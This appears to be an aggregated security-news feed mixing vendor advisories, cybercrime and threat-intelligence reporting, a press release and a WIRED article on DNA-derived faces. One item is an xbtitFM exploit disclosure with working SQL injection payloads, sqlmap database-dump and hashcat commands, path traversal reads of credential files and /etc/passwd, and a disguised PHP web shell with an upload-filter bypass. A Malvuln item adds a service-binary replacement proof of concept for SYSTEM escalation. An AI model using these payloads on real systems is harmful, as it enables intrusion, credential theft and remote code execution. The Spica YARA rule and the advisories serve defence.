Gentoo Linux Security Advisory 202401-26 - Multiple vulnerabilities have been found in Apache XML-RPC, the worst of which could result in arbitrary code execution. Versions less than or equal to 3.1.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-26  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Apache XML-RPC: Multiple Vulnerabilities  
     Date: January 22, 2024  
     Bugs: #713098  
       ID: 202401-26

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Apache XML-RPC, the worst of  
which could result in arbitrary code execution.

Background  
==========

Apache XML-RPC (previously known as Helma XML-RPC) is a Java  
implementation of XML-RPC, a popular protocol that uses XML over HTTP to  
implement remote procedure calls.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
dev-java/xmlrpc  <= 3.1.3      Vulnerable!

Description  
===========

Multiple vulnerabilities have been discovered in Apache XML-RPC. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

Gentoo has discontinued support for Apache XML-RPC. We recommend that  
users unmerge it:

  # emerge --ask --depclean "dev-java/xmlrpc"

References  
==========

[ 1 ] CVE-2016-5002  
      https://nvd.nist.gov/vuln/detail/CVE-2016-5002  
[ 2 ] CVE-2016-5003  
      https://nvd.nist.gov/vuln/detail/CVE-2016-5003  
[ 3 ] CVE-2019-17570  
      https://nvd.nist.gov/vuln/detail/CVE-2019-17570

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-26

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-26

xbtitFM versions 4.1.18 and below suffer from remote shell upload, remote SQL injection, and path traversal vulnerabilities.

    # Exploit Title: xbtitFM 4.1.18 Multiple Vulnerabilities# Date: 22-01-2024# Exploit Author: Who cares anyway# Vendor Homepage: https://xbtitfm.eu# Affected versions: 4.1.18 and prior# CVE : Who cares anyway# Description: The SQLi and the path traversal are unauthenticated, they don't require any user interaction to be exploited and are present in the default configuration of xbtitFM.The insecure file upload requires the file_hosting feature (hack) being enabled. If not, it can be enabled by gaining access to an administrator account.Looking at the state and the age of the codebase there are probably more, but who cares anyway...[Unauthenticated SQL Injection - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H]Some examples:Get DB name:/shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(DATABASE() AS NCHAR),0)),1,100)))) Get DB user:/shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(CURRENT_USER() AS NCHAR),0)),1,100)))) Get password hash of any user (might need some modification to work on different instances):/shoutedit.php?action=edit&msgid=1337 OR (1,1) = (SELECT COUNT(0),CONCAT((SELECT CONCAT_WS(0x3a,id,username,password,email,0x3a3a3a) FROM xbtit_users WHERE username='admin_username_or_whatever_you_like'),FLOOR(RAND(0)*2)) FROM (information_schema.tables) GROUP BY 2);Now the fun part. Automate it with sqlmap to dump the database.1) Get DB namesqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch --current-db2) Get table namessqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name --tables3) Dump users table (usually called xbtit_users)sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name -T xbtit_users -C id,username,email,cip,dob,password,salt,secret --dump4) Crack hashes (usually unsalted MD5, yey!)hashcat –m 0 xbtitfm_exported_hashes.txt wordlist.txtPro tip: Use All-in-One-P (https://weakpass.com/all-in-one)[Unauthenticated Path traversal - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N]1) Intentionally search for a file that doesn't exist to get the web application path e.g. (/home/xbtitfm/public_html/)https://example.xyz/nfo/nfogen.php?nfo=random_value_to_get_error_that_reveals_the_real_path2) Read files that contain database credentials.https://example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/settings.phphttps://example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/update.phpOr any other system file you want.https://example.xyz/nfo/nfogen.php?nfo=../../../../../../../etc/passwd3) Now who needs the SQLi to dump the DB when you have this gem? Check if the following file is configured https://example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/sxd/cfg.phpIf so, go to https://example.xyz/sxd (CBT Sql backup utilitiy aka Sypex-Dumper), login with the DB credentials you just found, now export the DB with on click. Nice and easy.[Insecure file upload - Remote Code Execution (Authenticated)- CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H]If that wasn't enough already and you want RCE, visit https://example.xyz/index.php?page=file_hostingIf the file hosting feature (hack) is enabled, then simply just upload a PHP shell with the following bypass.Changing the Content-Type of the file to image/gif and the first bytes to GIF89a; are enought to bypass the filetype checks.A silly contermeasure against PHP files is in place so make sure you change <?php to <?pHp to bypass it.Content-Disposition: form-data; name="file"; filename="definately_not_a_shell.php"Content-Type: image/gifGIF89a;<html><body><form method="GET" name="<?pHp echo basename($_SERVER['PHP_SELF']); ?>"><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre><?pHp    if(isset($_GET['cmd']))    {        system($_GET['cmd']);    }?></pre></body></html>The web shell will then be uploaded here:https://example.xyz/file_hosting/definately_not_a_shell.phpIf the file hosting feature is disabled, extract and crack the hash of an admin, then enable the feature from the administration panel and upload the shell.

xbtitFM 4.1.18 SQL Injection / Shell Upload / Traversal

TrojanSpy Win32 Nivdort malware suffers from an insecure permissions vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/15bda00b57e2ed729a45f7cfa62165da.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: TrojanSpy Win32 NivdortVulnerability: Insecure Permissions - EoP (SYSTEM) Family: NivdortType: PE32MD5: 15bda00b57e2ed729a45f7cfa62165daVuln ID: MVID-2024-0668Dropped files: dqrpgvnkh, egjrdhynfm, nhefhloix, rvoyf6ljtqg4zejno.exeDisclosure: 01/20/2024Description:The malware creates a service which runs as SYSTEM and grants change (C) permissions to the authenticated user group on its installation directory. Standard low integrity users can still rename the service executable while it is running, replace the PE file with their own and restart the infected system to start the service.C:\>cacls C:\pewcvmnvyr\jwgaklb.exeC:\pewcvmnvyr\jwgaklb.exe BUILTIN\Administrators:(ID)F                          NT AUTHORITY\SYSTEM:(ID)F                          BUILTIN\Users:(ID)R                          NT AUTHORITY\Authenticated Users:(ID)CC:\>sc qc "Group Key KtmRm Coordinator Registry TPM Bus"[SC] QueryServiceConfig SUCCESSSERVICE_NAME: Group Key KtmRm Coordinator Registry TPM Bus        TYPE               : 110  WIN32_OWN_PROCESS (interactive)        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 0   IGNORE        BINARY_PATH_NAME   : C:\pewcvmnvyr\jwgaklb.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : Group Key KtmRm Coordinator Registry TPM Bus        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystemExploit/PoC:Open a cmd prompt as standard user:1) unhide the service binary   C:\Users\norgt>attrib -s -h \pewcvmnvyr\jwgaklb.exe2) rename the service binaryC:\Users\norgt>ren \pewcvmnvyr\jwgaklb.exe PWNED3) optional replace with your own binary and escalate to SYSTEMC:\Users\norgt>dir \pewcvmnvyr\ Directory of C:\pewcvmnvyr        ..01/14/2024  02:05 AM                 0 dqrpgvnkh01/14/2024  02:05 AM                 6 egjrdhynfm01/14/2024  02:09 AM                 4 nhefhloix01/14/2024  02:05 AM           332,800 PWNED   <================= DONE01/14/2024  02:05 AM           332,800 rvoyf9njtqg4zejno.exeDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

TrojanSpy Win32 Nivdort MVID-2024-0668 Insecure Permissions

Red Hat Security Advisory 2024-0204-03 - Red Hat OpenShift Container Platform release 4.14.9 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0204.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.14.9 bug fix and security update  
Advisory ID:        RHSA-2024:0204-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0204  
Issue date:         2024-01-20  
Revision:           03  
CVE Names:          CVE-2023-45142  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.14.9 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.14.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.14.9. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:0207

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.14/release_notes/ocp-4-14-release-notes.html

Security Fix(es):

* opentelemetry: DoS vulnerability in otelhttp (CVE-2023-45142)

* opentelemetry-go-contrib: DoS vulnerability in otelgrpc due to unbound cardinality metrics (CVE-2023-47108)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.14 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.14/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-45142

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2245180  
https://bugzilla.redhat.com/show_bug.cgi?id=2251198  
https://issues.redhat.com/browse/OCPBUGS-19431  
https://issues.redhat.com/browse/OCPBUGS-22360  
https://issues.redhat.com/browse/OCPBUGS-22788  
https://issues.redhat.com/browse/OCPBUGS-22895  
https://issues.redhat.com/browse/OCPBUGS-23936  
https://issues.redhat.com/browse/OCPBUGS-24037  
https://issues.redhat.com/browse/OCPBUGS-24640  
https://issues.redhat.com/browse/OCPBUGS-25595  
https://issues.redhat.com/browse/OCPBUGS-25804  
https://issues.redhat.com/browse/OCPBUGS-25997  
https://issues.redhat.com/browse/OCPBUGS-26006  
https://issues.redhat.com/browse/OCPBUGS-26044  
https://issues.redhat.com/browse/OCPBUGS-26065  
https://issues.redhat.com/browse/OCPBUGS-26171  
https://issues.redhat.com/browse/OCPBUGS-26207  
https://issues.redhat.com/browse/OCPBUGS-26214  
https://issues.redhat.com/browse/OCPBUGS-26421

Red Hat Security Advisory 2024-0204-03

By Deeba Ahmed
Conor Brian Fitzpatrick (Pompompurin on the forum) launched BreachForums in March 2022 after the FBI took down the then-popular cybercrime marketplace, RaidForums.
This is a post from HackRead.com Read the original post: BreachForums Admin Pompompurin Gets 20-Year Supervised Sentence

Conor Brian Fitzpatrick was charged in March 2023 for stealing and selling sensitive personal data of countless US citizens and US and foreign organizations and government agencies via the forum.

Conor Brian Fitzpatrick, a 21-year-old man from Peekskill, New York, has been sentenced to 20 years of supervised release in the Eastern District of Virginia for operating the notorious BreachForums hacking forum.

For your information, Fitzpatrick launched BreachForums in March 2022 after the FBI took down the then-popular cybercrime marketplace, RaidForums. It served as an ideal platform for selling/leaking millions of personal data worldwide. The platform contained nearly 900 stolen databases storing more than 14 billion individual records, which BreachForums members were entitled to use. 

BreachForums ceased operations after the FBI apprehended Fitzpatrick and reportedly reemerged under the management of ShinyHunters, causing concern among cybersecurity experts and law enforcement agencies worldwide. Baphomet, one of the original forum administrators, confirmed the resurgence in a PGP-signed message, leaving little doubt about its authenticity.

Fitzpatrick was arrested on 15th March 2023 from his family home. Under custody, he admitted to owning/operating BreachForums under the “pompompurin” moniker. The accused was released on a $300,000 bond and was re-arrested on 2nd January 2024 for violating pretrial release conditions by using a computer without the required monitoring software and using VPN services.

Fitzpatrick was charged in March 2023 for stealing and selling sensitive personal data of countless US citizens and US and foreign organizations and government agencies via the forum. Court documents reveal that he possessed nearly 26 video files containing sexually explicit videos of minors, including prepubescent ones. Prosecutors claimed Fitzpatrick knowingly possessed these files.

The sentencing recommendation memo reveals several incidents involving Fitzpatrick, including a data leak in December 2022 exposing records of 87,760 members of InfraGuard, 200 million users of a US social media company, 20 million user records for a background check service company, and data theft involving thousands of users’ private health insurance information in March 2023.

Fitzpatrick pleaded guilty to several counts, including Conspiracy to Commit Access Device Fraud, Solicitation for the Purpose of Offering Access, and Possession of CSAM on July 13, 2023 (PDF). He served as a middleman for stolen data transactions and admitted to feeding false information to law enforcement.

Prosecutors sought 188 months (15.7 years) of imprisonment. The defendant’s attorneys filed a memo under seal recommending his sentencing, citing confidential and medical information that should not be disclosed to the public. The court showed leniency and sentenced Fitzpatrick to time served and 20 years of supervised release. The sentencing memorandum was submitted (PDF) on 16th January 2024.

Per the sentencing conditions (PDF), for the first two years of his release, Fitzpatrick will stay at home arrest with a GPS locator and also receive mental health treatment. Fitzpatrick cannot access the internet during his first year of supervised release, and a probation officer will install monitoring software on his computer.

Prosecutors claimed that Fitzpatrick’s platform enabled hackers and fraudsters to commit “more sophisticated crimes than any could have done alone,” impacting nearly every sector of U.S. society.

****_RELATED ARTICLES_****

1.  **Authorities seize the world’s biggest dark web child abuse site**
2.  **Data Breach at New BreachForums: 4,000 members’ data leaked**
3.  **Gender Diversity in Cybercrime Forums: Women Users on the Rise**
4.  **Raidforums Database Leak: Data of 460,000 Users Dumped Online**
5.  **Operator of Major Proxy Botnet ‘IPStorm’ Arrested, Pleads Guilty in US**

BreachForums Admin Pompompurin Gets 20-Year Supervised Sentence

Russian state-sponsored actor Coldriver uses spear phishing attacks to install the Spica backdoor on victim systems.

Researchers at Google’s Threat Analysis Group (TAG) have published their findings about a group they have dubbed Coldriver. The main targets of the Coldriver group are high-profile individuals in non-governmental organizations (NGOs), former intelligence and military officials, and NATO governments. These targets are approached in spear phishing attacks.

The group uses social engineering techniques to persuade their targets to open documents or download malware. Their activities are aligned with those of the Russian government, so it’s pretty safe to say that Coldriver is a state-sponsored group.

In December 2023, the US charged two Russians believed to be members of this group, for their role in a campaign that hacked government accounts.

Microsoft, who tracks the group as Star Blizzard, says the group targets individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests.

Typically, the group creates an impersonation account that pretends to be an expert in a field the target might be interested in or that is somehow affiliated with the target. Once a relationship has been established, the target will receive a phishing link or a document containing such a link.

To gain trust, Coldriver uses social media and professional marketing systems to build a profile of its target. With that information the group sets up email contacts, social media and other networking accounts that align with the target’s interests and appear legitimate.

Coldriver uses webmail addresses from different providers, including Outlook, Gmail, Yahoo and Proton Mail in the initial approach, impersonating known contacts of the target or well-known names in the target’s field of interest or sector. The group is also known to register malicious domains that mimic legitimate organizations.

Recently, TAG has noticed that the group uses “lure documents” to install a backdoor on the target’s system. These lure documents, which are harmless PDF files, are sent to the target, but when they open them the content appears to be encrypted.

When the target queries about the encryption, Coldriver sends the target a link to a decryption utility, typically hosted on a cloud storage site. This so-called decryption utility shows the target a normal PDF file, so that it appears as if the original was decrypted, but at the same time it installs a backdoor.

This backdoor is custom malware, likely developed by or for Coldriver, called Spica. Spica is written in the Rust programming language and supports, among others, these commands:

*   Execute arbitrary shell commands
*   Steal cookies from Chrome, Firefox, Opera, and Edge
*   Upload and download files
*   Analyze the filesystem by listing the content
*   Enumerate documents and copy them to an archive

The backdoor establishes persistence through an obfuscated PowerShell command that creates a scheduled task named CalendarChecker.

TAG suspects but has been unable to verify that there are multiple variants of Spica: one to match each lure document sent to targets.

**YARA rule**

YARA is a tool that can identify files that meet certain conditions. It is mainly in use by security researchers to classify malware.

TAG has created a YARA rule that cab help find the Spica backdoor.

rule SPICA\_\_Strings {  
meta:

author = “Google TAG”  
description = “Rust backdoor using websockets for c2 and embedded decoy PDF”  
hash = “37c52481711631a5c73a6341bd8bea302ad57f02199db7624b580058547fb5a9”  
strings:  
$s1 = “os\_win.c:%d: (%lu) %s(%s) – %s”  
$s2 = “winWrite1”  
$s3 = “winWrite2”  
$s4 = “DNS resolution panicked”  
$s5 = “struct Dox”  
$s6 = “struct Telegram”  
$s8 = “struct Download”  
$s9 = “spica”  
$s10 = “Failed to open the subkey after setting the value.”  
$s11 = “Card Holder: Bull Gayts”  
$s12 = “Card Number: 7/ 3310 0195 4865”  
$s13 = “CVV: 592”  
$s14 = “Card Expired: 03/28”

$a0 = “agent\\\\src\\\\archive.rs”  
$a1 = “agent\\\\src\\\\main.rs”  
$a2 = “agent\\\\src\\\\utils.rs”  
$a3 = “agent\\\\src\\\\command\\\\dox.rs”  
$a4 = “agent\\\\src\\\\command\\\\shell.rs”  
$a5 = “agent\\\\src\\\\command\\\\telegram.rs”  
$a6 = “agent\\\\src\\\\command\\\\mod.rs”  
$a7 = “agent\\\\src\\\\command\\\\mod.rs”  
$a8 = “agent\\\\src\\\\command\\\\cookie\\\\mod.rs”  
$a9 = “agent\\\\src\\\\command\\\\cookie\\\\browser\\\\mod.rs”  
$a10 = “agent\\\\src\\\\command\\\\cookie\\\\browser\\\\browser\_name.rs”  
condition:  
7 of ($s\*) or 5 of ($a\*)  
}

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 Coldriver threat group targets high-ranking officials to obtain credentials 

By Owais Sultan
Finclusive, Verida and cheqd Launch Pioneering Solution For Reusable And Verifiable KYC/KYB Credentials.
This is a post from HackRead.com Read the original post: Finclusive, Verida, and cheqd Launch Reusable KYC/KYB Solution

KYC/KYB compliance technology provider FinClusive said today it’s partnering with Verida and cheqd to launch an end-to-end platform for the creation and issuance of reusable and verifiable credentials that can be checked in real-time without impacting the privacy of clients. The partners say it’s a key innovation that promises to streamline client onboarding in both traditional finance and the nascent Web3 industry. 

What they’re offering is a plug-and-play platform that can handle the KYC/KYB requirements of any financial services organization, and generate verifiable credentials that are reusable and portable, with full client privacy and embedded compliance. 

The partnership builds on an earlier proof-of-concept demonstrated by FinClusive and Verida, which provides a mobile wallet for storing verifiable credentials. With the addition of cheqd into the mix, FinClusive said it can now offer the essential network infrastructure for Web3 companies to issue and verify credentials in seconds. 

With their new solution, the companies are looking to tackle some of the most significant headaches faced by organizations in the traditional customer onboarding and verification process, which is both expensive and time-consuming. Issuing digital credentials that can be reused, helps to eliminate the high costs associated with KYC/KYB. Moreover, with its instantaneous check feature for AML assistance, risk scoring and other background screenings, the solution makes it simpler than ever to meet compliance requirements. Finally, by integrating real-time and verifiable data sharing into the solution, the companies say they can provide maximum assurance for businesses, without requiring them to perform any manual checks. 

By addressing these headaches, Finclusive says it’s bringing significant value to businesses, reducing their operating costs and improving the efficiency of their screening processes. 

**Streamlined Customer Onboarding**

Each of the partners brings its strengths to the table, offering a variety of capabilities that are needed to create a regulatory-compliant process for verifying and sharing KYC credentials. FinClusive handles the initial identity verification checks with support for more than 170 countries, while cheqd’s Credential Service enables verifiable digital credentials to be issued, based on the results of those checks, and shared with other parties. As for Verida, it provides a decentralized wallet infrastructure for businesses and individuals to cryptographically store their KYC/KYB credentials inside a secure Verida Vault.

As the companies explained, the biggest advantage for businesses and individuals is that they will only ever have to undergo KYC/KYB once, and then use their verified credentials to access any application or service without constantly repeating that process. However, the solution goes further than similar offerings, leveraging FinClusive’s compliance tech and cheqd’s infrastructure platform to provide instant lookups for AML screenings and other background checks, meaning that the credentials can be verified, issued, managed, shared and revoked at any time. 

The beauty of this platform is that customers can maintain self-sovereign control of their KYC/KYB data, in keeping with regulations such as Europe’s existing GDPR and upcoming eIDAS, and the U.S. CCPA standard. Previously, where KYC/KYB data would have to be shared with multiple financial services providers, this information remains private yet fully verifiable. In this way, the partners are creating a more efficient market for identity verification while eliminating the need to replicate and store sensitive information. 

**Real-Time Monitoring **

Uniquely, FinClusive and its partners can facilitate enhanced and ongoing KYC/KYB processes beyond the initial onboarding stage. In some financial markets, service providers have additional obligations such as ongoing client monitoring, dynamic risk scoring and continuous AML screening checks. Using FinClusive’s tools, the solution can automate real-time client monitoring processes within an easy-to-use dashboard, while also enabling the simultaneous verification and live “double-check” of KYC/KYB data. 

**Disrupting Regulated Industries**

The companies cite several obvious use cases for their new solution, such as onboarding at any bank or nonbank financial service, plus any virtual asset service provider, at low cost and with more streamlined efficiency. The solution will also support KYC/KYB for eCommerce and online retailers, access to age-restricted content, government services and cross-border transactions. Finally, it also paves the way for KYC/KYB data to be paired with educational, employment, loyalty and health credentials to build higher levels of assurance and reinforce digital identities and reputations. 

Following today’s announcement, the companies say they’re expecting to roll out the first verifiable credentials for KYC/KYB within the first quarter of this year, kick-starting a revolution that will modernize client onboarding and monitoring across both traditional finance and the Web3 industry. 

Alex Tweeddale, a product lead at cheqd, said the collaboration is extremely innovative, paving the way for real-time monitoring and verification in a fully decentralized and private manner. “This is completely new to the market and enables us to provide a fully regulatory-compliant solution for customer onboarding and monitoring, while simultaneously being future-proofed for the new eIDAS 2.0 regulation for digital credentials,” he said. “This can revolutionize the existing paradigm for customer data sharing, reducing costs and friction within existing regulated industries and emerging markets where identity verification is currently too costly.”

Finclusive, Verida, and cheqd Launch Reusable KYC/KYB Solution

Police around the US say they're justified to run DNA-generated 3D models of faces through facial recognition tools to help crack cold cases. Everyone but the cops thinks that’s a bad idea.

In 2017, detectives working a cold case at the East Bay Regional Park District Police Department got an idea, one that might help them finally get a lead on the murder of Maria Jane Weidhofer. Officers had found Weidhofer, dead and sexually assaulted, at Berkeley, California’s Tilden Regional Park in 1990. Nearly 30 years later, the department sent genetic information collected at the crime scene to Parabon NanoLabs—a company that says it can turn DNA into a face.

Parabon NanoLabs ran the suspect’s DNA through its proprietary machine learning model. Soon, it provided the police department with something the detectives had never seen before: the face of a potential suspect, generated using only crime scene evidence.

The image Parabon NanoLabs produced, called a Snapshot Phenotype Report, wasn’t a photograph. It was a 3D rendering that bridges the uncanny valley between reality and science fiction; a representation of how the company’s algorithm predicted a person could look given genetic attributes found in the DNA sample.

The face of the murderer, the company predicted, was male. He had fair skin, brown eyes and hair, no freckles, and bushy eyebrows. A forensic artist employed by the company photoshopped a nondescript, close-cropped haircut onto the man and gave him a mustache—an artistic addition informed by a witness description and not the DNA sample.

In a controversial 2017 decision, the department published the predicted face in an attempt to solicit tips from the public. Then, in 2020, one of the detectives did something civil liberties experts say is even more problematic—and a violation of Parabon NanoLabs’ terms of service: He asked to have the rendering run through facial recognition software.

“Using DNA found at the crime scene, Parabon Labs reconstructed a possible suspect’s facial features,” the detective explained in a request for “analytical support” sent to the Northern California Regional Intelligence Center, a so-called fusion center that facilitates collaboration among federal, state, and local police departments. “I have a photo of the possible suspect and would like to use facial recognition technology to identify a suspect/lead.”

The detective’s request to run a DNA-generated estimation of a suspect’s face through facial recognition tech has not previously been reported. Found in a trove of hacked police records published by the transparency collective Distributed Denial of Secrets, it appears to be the first known instance of a police department attempting to use facial recognition on a face algorithmically generated from crime-scene DNA.

It likely won’t be the last.

For facial recognition experts and privacy advocates, the East Bay detective’s request, while dystopian, was also entirely predictable. It emphasizes the ways that, without oversight, law enforcement is able to mix and match technologies in unintended ways, using untested algorithms to single out suspects based on unknowable criteria.

“It’s really just junk science to consider something like this,” Jennifer Lynch, general counsel at civil liberties nonprofit the Electronic Frontier Foundation, tells WIRED. Running facial recognition with unreliable inputs, like an algorithmically generated face, is more likely to misidentify a suspect than provide law enforcement with a useful lead, she argues. “There’s no real evidence that Parabon can accurately produce a face in the first place,” Lynch says. “It’s very dangerous, because it puts people at risk of being a suspect for a crime they didn’t commit.”

It is unknown whether the Northern California Regional Intelligence Center honored the East Bay detective’s request. The NCRIC did not respond to WIRED’s requests for comment about the outcome of the detective's facial recognition request. Captain Terrence Cotcher of the East Bay Regional Park District PD would not comment on the identification request, citing what he describes as an active homicide investigation. However, the executive director of the NCRIC, Mike Sena, told The Markup in 2021 that whenever the fusion center gets facial recognition requests, it will run a search.

For Parabon NanoLabs, if the department ran the predicted face through facial recognition, it isn’t just a violation of the company’s terms of service—it’s a terrible idea.

Parabon NanoLabs, founded in 2008, primarily focuses on forensic genetic genealogy services for law enforcement, a process that involves comparing DNA data with profiles in genealogy databases to locate potential suspects or victims. In 2012, the company received a grant from the US Department of Defense’s Defense Threat Reduction Agency to explore DNA phenotyping, predicting a person's appearance based only on their DNA. According to a 2020 article in _Nature_, the DOD was initially interested in developing phenotyping technology to re-create the faces of people who made improvised explosive devices, using traces of DNA left on the bomb fragments. Parabon pitched an ambitious method that involved machine learning to receive its grant.

Ellen Greytak, the director of bioinformatics at Parabon NanoLabs, says the company uses machine learning to build predictive models “for each part of the face.” The models are trained on the DNA data of more than 1,000 research volunteers and paired with 3D scans of their faces. Each scanned face, Greytak says, has 21,000 phenotypes—observable physical traits—that their models crunch in order to figure out how parts of a DNA sample affect a face’s appearance.

Parabon says it can confidently predict the color of a person's hair, eyes, and skin, along with the amount of freckles they have and the general shape of their face. These phenotypes form the basis of the face renderings the company generates for law enforcement. Parabon’s methods have not been peer-reviewed, and scientists are skeptical about how feasible predicting face shape even is.

In response to questions about the technology's accuracy, Parabon NanoLabs vice president Paula Armentrout tells WIRED that, while the details of its methods are not public, the company has presented its work at conferences and has tested its technology on thousands of samples. She adds that the company posts on its website “every single composite that is publicly disclosed by a customer, so people can draw their own conclusions about how well our technology works.”

Greytak characterizes the company’s face predictions as something more like a description of a suspect than an exact replica of their face. “What we are predicting is more like—given this person’s sex and ancestry, will they have wider-set eyes than average,” she says. “There’s no way you can get individual identifications from that.”

When Parabon NanoLabs launched its face-prediction service around 2015, its terms of service did not explicitly ban clients from using predictions with facial recognition. Soon after launching, however, the company’s law enforcement clients started asking about the viability of running phenotype-generated faces through facial recognition tools. “We were surprised when we heard this,” Greytak says. “It’s just not the intended purpose of the composite images.” In 2016, the company added a clause to its terms prohibiting customers from using facial recognition on its Snapshot Phenotype Reports. However, Armentrout tells WIRED that the company “does not have a way to ensure compliance” with its TOS.

Eight years later, after generating scores of face predictions for law enforcement, some of Parabon NanoLabs’ clients see little reason to not consider using face recognition on these algorithmically generated faces. Officers at all of the departments that WIRED contacted say it should at least be an option.

Jason McDonald is a detective with the Aurora, Colorado, police department’s Major Crime-Homicide Unit. In 2016, his department asked Parabon to use DNA found on the scenes of four 1984 homicides to predict the face of a suspect. McDonald tells WIRED that he believes that running a predicted face through facial recognition could be “justified” and “possibly a useful tool.”

Detective Edward Silver of the St. Clair County Sheriff’s Department in Michigan agrees. His department used Parabon NanoLabs in 2021 to generate the face of a woman whose severely burned body was found in a dumpster in 2003. Silver tells WIRED that he believes the Snapshot Phenotype Reports are accurate enough for facial recognition software.

Representatives from sheriff's offices in Lake County, Florida, and DeKalb County, Illinois, also say they would consider using Parabon NanoLabs’ predicted faces with facial recognition tools. Sheriff Andrew Sullivan of the DeKalb County Sheriff’s Office says in an email that “if there was DNA evidence that was used in the development of Snapshot, yes, we would use that information to try and develop any lead that we had further to solve any homicide.”

Haley Williams, a communications manager with the Boise Police Department in Idaho, tells WIRED in an email that the decision to use facial recognition with an algorithmically generated face would be made on a “case-by-case” basis. She added, however, that the department would “never rely solely on any one piece of evidence and would only use it as a tool to help direct us to other leads or evidence.”

“These are decades-old cases that we have been working,” says a cold-case detective who asked not to be named because they are not authorized to speak to the media. “I know that the Parabon face isn’t perfect, but why wouldn’t we use every tool available to us to try and catch a killer?” Asked if he tried facial recognition with the predicted face, the detective declined to answer, but says, “the family deserves to know that we tried everything.”

